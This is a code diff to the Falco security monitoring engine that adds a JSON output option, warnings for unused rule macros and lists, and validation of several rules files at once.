void falco_formats::init(sinsp* inspector, lua_State *ls, bool json_output)
void falco_formats::init(sinsp* inspector, lua_State *ls, bool json_output, bool json_include_output_property)
{
s_inspector = inspector;
s_json_output = json_output;
s_json_include_output_property = json_include_output_property;
if(!s_formatters)
{
s_formatters = new sinsp_evt_formatter_cache(s_inspector);
@@ -155,8 +157,12 @@ int falco_formats::format_event (lua_State *ls)
event["time"] = iso8601evttime;
event["rule"] = rule;
event["priority"] = level;
// This is the filled-in output line.
event["output"] = line;
if(s_json_include_output_property)
{
// This is the filled-in output line.
event["output"] = line;
}
full_line = writer.write(event);

View File

@@ -31,7 +31,7 @@ class sinsp_evt_formatter;
class falco_formats
{
public:
static void init(sinsp* inspector, lua_State *ls, bool json_output);
static void init(sinsp* inspector, lua_State *ls, bool json_output, bool json_include_output_property);
// formatter = falco.formatter(format_string)
static int formatter(lua_State *ls);
@@ -48,4 +48,5 @@ class falco_formats
static sinsp* s_inspector;
static sinsp_evt_formatter_cache *s_formatters;
static bool s_json_output;
static bool s_json_include_output_property;
};

View File

@@ -76,7 +76,8 @@ function expand_macros(ast, defs, changed)
if (defs[ast.value.value] == nil) then
error("Undefined macro '".. ast.value.value .. "' used in filter.")
end
ast.value = copy_ast_obj(defs[ast.value.value])
defs[ast.value.value].used = true
ast.value = copy_ast_obj(defs[ast.value.value].ast)
changed = true
return changed
end
@@ -88,7 +89,8 @@ function expand_macros(ast, defs, changed)
if (defs[ast.left.value] == nil) then
error("Undefined macro '".. ast.left.value .. "' used in filter.")
end
ast.left = copy_ast_obj(defs[ast.left.value])
defs[ast.left.value].used = true
ast.left = copy_ast_obj(defs[ast.left.value].ast)
changed = true
end
@@ -96,7 +98,8 @@ function expand_macros(ast, defs, changed)
if (defs[ast.right.value] == nil) then
error("Undefined macro ".. ast.right.value .. " used in filter.")
end
ast.right = copy_ast_obj(defs[ast.right.value])
defs[ast.right.value].used = true
ast.right = copy_ast_obj(defs[ast.right.value].ast)
changed = true
end
@@ -109,7 +112,8 @@ function expand_macros(ast, defs, changed)
if (defs[ast.argument.value] == nil) then
error("Undefined macro ".. ast.argument.value .. " used in filter.")
end
ast.argument = copy_ast_obj(defs[ast.argument.value])
defs[ast.argument.value].used = true
ast.argument = copy_ast_obj(defs[ast.argument.value].ast)
changed = true
end
return expand_macros(ast.argument, defs, changed)
@@ -283,11 +287,28 @@ function get_evttypes(name, ast, source)
return evttypes
end
function compiler.expand_lists_in(source, list_defs)
for name, def in pairs(list_defs) do
local begin_name_pat = "^("..name..")([%s(),=])"
local mid_name_pat = "([%s(),=])("..name..")([%s(),=])"
local end_name_pat = "([%s(),=])("..name..")$"
source, subcount1 = string.gsub(source, begin_name_pat, table.concat(def.items, ", ").."%2")
source, subcount2 = string.gsub(source, mid_name_pat, "%1"..table.concat(def.items, ", ").."%3")
source, subcount3 = string.gsub(source, end_name_pat, "%1"..table.concat(def.items, ", "))
if (subcount1 + subcount2 + subcount3) > 0 then
def.used = true
end
end
return source
end
function compiler.compile_macro(line, macro_defs, list_defs)
for name, items in pairs(list_defs) do
line = string.gsub(line, name, table.concat(items, ", "))
end
line = compiler.expand_lists_in(line, list_defs)
local ast, error_msg = parser.parse_filter(line)
@@ -325,14 +346,7 @@ end
--]]
function compiler.compile_filter(name, source, macro_defs, list_defs)
for name, items in pairs(list_defs) do
local begin_name_pat = "^("..name..")([%s(),=])"
local mid_name_pat = "([%s(),=])("..name..")([%s(),=])"
local end_name_pat = "([%s(),=])("..name..")$"
source = string.gsub(source, begin_name_pat, table.concat(items, ", ").."%2")
source = string.gsub(source, mid_name_pat, "%1"..table.concat(items, ", ").."%3")
source = string.gsub(source, end_name_pat, "%1"..table.concat(items, ", "))
end
source = compiler.expand_lists_in(source, list_defs)
local ast, error_msg = parser.parse_filter(source)

View File

@@ -347,13 +347,13 @@ function load_rules(rules_content, rules_mgr, verbose, all_events, extra, replac
if (state.lists[item] == nil) then
items[#items+1] = item
else
for i, exp_item in ipairs(state.lists[item]) do
for i, exp_item in ipairs(state.lists[item].items) do
items[#items+1] = exp_item
end
end
end
state.lists[v['list']] = items
state.lists[v['list']] = {["items"] = items, ["used"] = false}
end
for i, name in ipairs(state.ordered_macro_names) do
@@ -361,7 +361,7 @@ function load_rules(rules_content, rules_mgr, verbose, all_events, extra, replac
local v = state.macros_by_name[name]
local ast = compiler.compile_macro(v['condition'], state.macros, state.lists)
state.macros[v['macro']] = ast.filter.value
state.macros[v['macro']] = {["ast"] = ast.filter.value, ["used"] = false}
end
for i, name in ipairs(state.ordered_rule_names) do
@@ -443,6 +443,21 @@ function load_rules(rules_content, rules_mgr, verbose, all_events, extra, replac
end
end
if verbose then
-- Print info on any dangling lists or macros that were not used anywhere
for name, macro in pairs(state.macros) do
if macro.used == false then
print("Warning: macro "..name.." not refered to by any rule/macro")
end
end
for name, list in pairs(state.lists) do
if list.used == false then
print("Warning: list "..name.." not refered to by any rule/macro/list")
end
end
end
io.flush()
end

View File

@@ -67,6 +67,7 @@ void falco_configuration::init(string conf_filename, list<string> &cmdline_optio
}
m_json_output = m_config->get_scalar<bool>("json_output", false);
m_json_include_output_property = m_config->get_scalar<bool>("json_include_output_property", true);
falco_outputs::output_config file_output;
file_output.name = "file";

View File

@@ -167,6 +167,7 @@ class falco_configuration
std::list<std::string> m_rules_filenames;
bool m_json_output;
bool m_json_include_output_property;
std::vector<falco_outputs::output_config> m_outputs;
uint32_t m_notifications_rate;
uint32_t m_notifications_max_burst;

View File

@@ -111,7 +111,8 @@ static void usage()
" single line emitted by falco to be flushed, which generates higher CPU\n"
" usage but is useful when piping those outputs into another process\n"
" or into a script.\n"
" -V,--validate <rules_file> Read the contents of the specified rules file and exit\n"
" -V,--validate <rules_file> Read the contents of the specified rules(s) file and exit\n"
" Can be specified multiple times to validate multiple files.\n"
" -v Verbose output.\n"
" --version Print version number.\n"
"\n"
@@ -245,7 +246,7 @@ int falco_init(int argc, char **argv)
string pidfilename = "/var/run/falco.pid";
bool describe_all_rules = false;
string describe_rule = "";
string validate_rules_file = "";
list<string> validate_rules_filenames;
string stats_filename = "";
bool verbose = false;
bool all_events = false;
@@ -282,7 +283,7 @@ int falco_init(int argc, char **argv)
{"pidfile", required_argument, 0, 'P' },
{"unbuffered", no_argument, 0, 'U' },
{"version", no_argument, 0, 0 },
{"validate", required_argument, 0, 0 },
{"validate", required_argument, 0, 'V' },
{"writefile", required_argument, 0, 'w' },
{0, 0, 0, 0}
@@ -396,7 +397,7 @@ int falco_init(int argc, char **argv)
verbose = true;
break;
case 'V':
validate_rules_file = optarg;
validate_rules_filenames.push_back(optarg);
break;
case 'w':
outfile = optarg;
@@ -460,10 +461,17 @@ int falco_init(int argc, char **argv)
}
}
if(validate_rules_file != "")
if(validate_rules_filenames.size() > 0)
{
falco_logger::log(LOG_INFO, "Validating rules file: " + validate_rules_file + "...\n");
engine->load_rules_file(validate_rules_file, verbose, all_events);
falco_logger::log(LOG_INFO, "Validating rules file(s):\n");
for(auto file : validate_rules_filenames)
{
falco_logger::log(LOG_INFO, " " + file + "\n");
}
for(auto file : validate_rules_filenames)
{
engine->load_rules_file(file, verbose, all_events);
}
falco_logger::log(LOG_INFO, "Ok\n");
goto exit;
}
@@ -539,6 +547,7 @@ int falco_init(int argc, char **argv)
}
outputs->init(config.m_json_output,
config.m_json_include_output_property,
config.m_notifications_rate, config.m_notifications_max_burst,
config.m_buffered_outputs);

View File

@@ -52,7 +52,9 @@ falco_outputs::~falco_outputs()
}
}
void falco_outputs::init(bool json_output, uint32_t rate, uint32_t max_burst, bool buffered)
void falco_outputs::init(bool json_output,
bool json_include_output_property,
uint32_t rate, uint32_t max_burst, bool buffered)
{
// The engine must have been given an inspector by now.
if(! m_inspector)
@@ -65,7 +67,7 @@ void falco_outputs::init(bool json_output, uint32_t rate, uint32_t max_burst, bo
// Note that falco_formats is added to both the lua state used
// by the falco engine as well as the separate lua state used
// by falco outputs.
falco_formats::init(m_inspector, m_ls, json_output);
falco_formats::init(m_inspector, m_ls, json_output, json_include_output_property);
falco_logger::init(m_ls);

View File

@@ -41,7 +41,9 @@ public:
std::map<std::string, std::string> options;
};
void init(bool json_output, uint32_t rate, uint32_t max_burst, bool buffered);
void init(bool json_output,
bool json_include_output_property,
uint32_t rate, uint32_t max_burst, bool buffered);
void add_output(output_config oc);